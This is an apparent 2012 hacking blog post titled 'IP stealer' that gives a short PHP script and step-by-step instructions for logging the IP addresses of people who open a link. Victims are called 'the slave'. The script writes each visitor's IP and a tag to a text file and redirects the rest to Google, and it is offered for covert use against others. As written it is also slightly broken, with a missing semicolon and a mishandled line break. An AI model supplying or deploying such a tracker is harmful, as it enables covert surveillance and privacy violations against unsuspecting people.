Wednesday 15 August 2012

IP stealer


1. create a php file from this code.

Code:
<?php
$file = 'IPz.txt';
$handle = fopen($file,'a');
if(!isset($_GET['p'])) { header('Location:
http://google.com'); }
fwrite($handle, $_GET['p'].': '.$_SERVER
['REMOTE_ADDR'].'\r\n');
fclose($handle)
?>

2. Another a text file name IPz create.

3. both upload a free web site hosting.

4. then link send to the slave.

5. binngo!!


No comments:

Post a Comment